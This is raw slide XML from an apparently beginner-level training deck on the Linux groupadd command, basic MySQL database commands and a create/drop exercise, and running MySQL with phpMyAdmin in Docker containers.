            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="855925" y="2329100"/>
            <a:ext cx="7213500" cy="1079400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>groupadd &lt;groupName&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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6" name="Shape 4646"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4647" name="Google Shape;4647;p754"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240825" y="0"/>
            <a:ext cx="8743500" cy="8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MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Container</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4648" name="Google Shape;4648;p754"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496950" y="950400"/>
            <a:ext cx="8335500" cy="38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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.w3schools.com/sql/default.asp</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>DATABASE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>databasename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="300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000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>show databases;</a:t>
            </a:r>
            <a:endParaRPr sz="300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0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>DROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>DATABASE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>databasename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>show databases;</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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2" name="Shape 4652"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4653" name="Google Shape;4653;p755"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240825" y="0"/>
            <a:ext cx="8743500" cy="8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MySQL Assignment</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4654" name="Google Shape;4654;p755"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496950" y="950400"/>
            <a:ext cx="8335500" cy="38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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create database from a_db to z_db;</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-400050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create</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Show</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Create</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Show</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Create</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Show</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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8" name="Shape 4658"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4659" name="Google Shape;4659;p756"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240825" y="0"/>
            <a:ext cx="8743500" cy="8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MySQL Assignment</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4660" name="Google Shape;4660;p756"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496950" y="950400"/>
            <a:ext cx="8335500" cy="38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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> database from z_db to a_db;</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-400050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Delete</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Show</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Delete</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Show</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Delete</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 sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Show</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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4" name="Shape 4664"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4665" name="Google Shape;4665;p7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66" name="Google Shape;4666;p7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900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/ugoviti/izpbx/</a:t>
            </a:r>
            <a:endParaRPr sz="2900"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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0" name="Shape 4670"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4671" name="Google Shape;4671;p758"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000600" y="152400"/>
            <a:ext cx="6850403" cy="4838700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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5" name="Shape 4675"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4676" name="Google Shape;4676;p759"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="292950" y="250125"/>
            <a:ext cx="8743500" cy="880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sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create MySQL Container with Phpmyadin using docker compose</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4677" name="Google Shape;4677;p759"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496950" y="1570225"/>
            <a:ext cx="8335500" cy="32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dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GUI = Graphical User Interface</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PhpMyAdmin</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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1" name="Shape 4681"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4682" name="Google Shape;4682;p760"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1454300" y="575525"/>
            <a:ext cx="59865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dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How container can talk to each other ?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4683" name="Google Shape;4683;p760"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009100" y="1017725"/>
            <a:ext cx="6789876" cy="3564675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4684" name="Google Shape;4684;p760"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1706800" y="4486150"/>
            <a:ext cx="1545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rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4685" name="Google Shape;4685;p760"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5888988" y="4486150"/>
            <a:ext cx="1545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dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Database</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4686" name="Google Shape;4686;p760"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7375550" y="3667463"/>
            <a:ext cx="1058874" cy="1058874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4687" name="Google Shape;4687;p760"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3327488" y="3049125"/>
            <a:ext cx="22401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Docker network</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4688" name="Google Shape;4688;p760"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7434298" y="208000"/>
            <a:ext cx="1488000" cy="424142"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4689" name="Google Shape;4689;p760"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="345150" y="3726875"/>
            <a:ext cx="1361654" cy="759276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4690" name="Google Shape;4690;p760"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="601925" y="4582400"/>
            <a:ext cx="8481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8080</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4691" name="Google Shape;4691;p760"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="39238" l="0" r="0" t="44482"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3166000" y="3873625"/>
            <a:ext cx="2605545" cy="424150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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5" name="Shape 4695"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4696" name="Google Shape;4696;p76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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There are 2 ways to create </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>these</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> containers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4697" name="Google Shape;4697;p7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19100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker run (Not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recommended</a:t>
